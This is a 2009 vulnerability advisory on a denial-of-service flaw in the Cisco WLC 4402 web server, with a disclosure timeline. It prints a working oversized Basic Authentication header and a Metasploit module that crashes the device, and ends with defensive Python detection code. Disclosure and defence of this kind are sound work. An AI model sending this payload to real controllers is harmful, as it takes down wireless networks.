Cisco WLC 4402 Denial-of-Service vulnerability

2009-07-26 / 2009-07-27
Credit: SySS
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=======================================
Vulnerable Product: Cisco WLC 4402 (most likely among many others)
Vulnerability discovered: January 2009
Reported to vendor: Jan 01, 2009
Fix available: not yet
=======================================

TIMELINE:
---------------------------------------------------
+ 01/11/2009: discovered vulnerability on a customer's site
+ 01/13/2009: initial vendor contact via psirt_at_cisco.com
+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
+ 02/09/2009: vendor states that the bugfix is _not_ contained within cisco-sa-20090204-wlc
+ 03/30/2009: vendor states: "We have a fix for this issue. However, due to some other issues we are investigating we may not make this public until about 42 days."
+ 06/02/2009: vendor states: "I really apologize for the delay on publishing this advisory. The reason that we have not publish is because we are also incorporating other security fixes within all the affected releases. We WILL be publishing the advisory on July 8th, 2009 at 1600 UTC."
+ 07/24/2009: Customer agreed with full disclosure
+ 07/26/2009: Still no fixes available; full disclosure due to lacking vendor activities.

PRODUCT:
---------------------------------------------------
The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via an integrated embedded webserver (emweb httpd).

AFFECTED VERSIONS:
---------------------------------------------------
The vulnerability described below has been verified on WLC 4402, software release 5.1.151.0. However, since the vulnerability affects the integrated embedded emweb http daemon, several other products and/or software releases might be affected, too.

VULNERABILITY:
---------------------------------------------------
Using long, random authentication data, the embedded web server can be crashed, which leads to a device reboot. Subsequent repeated requests lead to a permanent denial of service of the WLC (and therefore of the whole wireless infrastructure).
EXPLOIT:
---------------------------------------------------
Not needed. One only has to call "/screens/frameset.html" and provide Basic Authentication data which uses a username and password longer than 63 characters each. The following header worked for me:

Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0

The following code snippet can be used as a module within the metasploit framework:

---- snip -----
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco WLC 4200 Basic Auth Denial of Service',
      'Description'    => %q{
        This module triggers a Denial of Service condition in the Cisco WLC 4200
        HTTP server. By sending a GET request with long authentication data,
        the device becomes unresponsive and reboots. Firmware is reportedly
        vulnerable.
      },
      'Author'         => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 5949 $',
      'References'     =>
        [
          [ 'BID', '???'],
          [ 'CVE', '???'],
          [ 'URL', 'http://www.cisco.com/?????'],
        ],
      'DisclosureDate' => 'January 26 2009'))

    register_options(
      [
        Opt::RPORT(80),
      ], self.class)
  end

  def run
    connect
    print_status("Sending HTTP DoS packet")
    # Request line followed by the oversized Basic Authorization header,
    # with CRLF line endings as HTTP requires.
    sploit = "GET /screens/frameset.html HTTP/1.0\r\n" +
             "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
    sock.put(sploit + "\r\n")
    disconnect
  end

end
---- snip ----
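From the defending side, the 63-character threshold the advisory cites can be enforced in front of the controller (on a reverse proxy, WAF or IDS rule) so that such requests never reach the embedded webserver. The following Python is an added example written for this page, not code from SySS or from the Metasploit module above; the sample requests are constructed inline, and the function and constant names (inspect_basic_auth, flag_requests, MAX_CRED_LEN) are assumptions.

```python
import base64
import binascii
import re

# Threshold from the advisory: Basic credentials longer than 63 characters crash the emweb httpd.
MAX_CRED_LEN = 63

def inspect_basic_auth(header_value, limit=MAX_CRED_LEN):
    """Decode an Authorization header value; report credential lengths or why it is malformed."""
    parts = header_value.strip().split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return {"oversized": False, "malformed": "not Basic"}
    try:
        decoded = base64.b64decode(parts[1], validate=True)
    except (binascii.Error, ValueError):
        return {"oversized": False, "malformed": "bad base64"}
    user, sep, password = decoded.partition(b":")
    if not sep:
        return {"oversized": False, "malformed": "no colon"}
    return {
        "user_len": len(user),
        "pass_len": len(password),
        "oversized": len(user) > limit or len(password) > limit,
    }

# Matches one header line; the lazy group stops before an optional CR so CRLF requests parse cleanly.
AUTH_RE = re.compile(r"^Authorization:[ \t]*(.+?)\r?$", re.IGNORECASE | re.MULTILINE)

def flag_requests(raw_requests, limit=MAX_CRED_LEN):
    """Return the indices of raw HTTP requests whose Basic credentials exceed the limit."""
    flagged = []
    for i, req in enumerate(raw_requests):
        match = AUTH_RE.search(req)
        if match and inspect_basic_auth(match.group(1), limit)["oversized"]:
            flagged.append(i)
    return flagged

# Constructed sample requests (not captured traffic): a normal login, a request
# with a 64-character username and password, and a non-Basic scheme.
NORMAL = base64.b64encode(b"admin:s3cret").decode()
OVERSIZED = base64.b64encode(b"1" * 64 + b":" + b"2" * 64).decode()
SAMPLE_REQUESTS = [
    "GET /screens/frameset.html HTTP/1.0\r\nAuthorization: Basic " + NORMAL + "\r\n\r\n",
    "GET /screens/frameset.html HTTP/1.0\r\nAuthorization: Basic " + OVERSIZED + "\r\n\r\n",
    "GET /screens/frameset.html HTTP/1.0\r\nAuthorization: Bearer not-basic\r\n\r\n",
]
```

Requests flagged by flag_requests can be rejected or logged before they are forwarded to the WLC management interface.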

References:

http://seclists.org/fulldisclosure/2009/Jul/0407.html

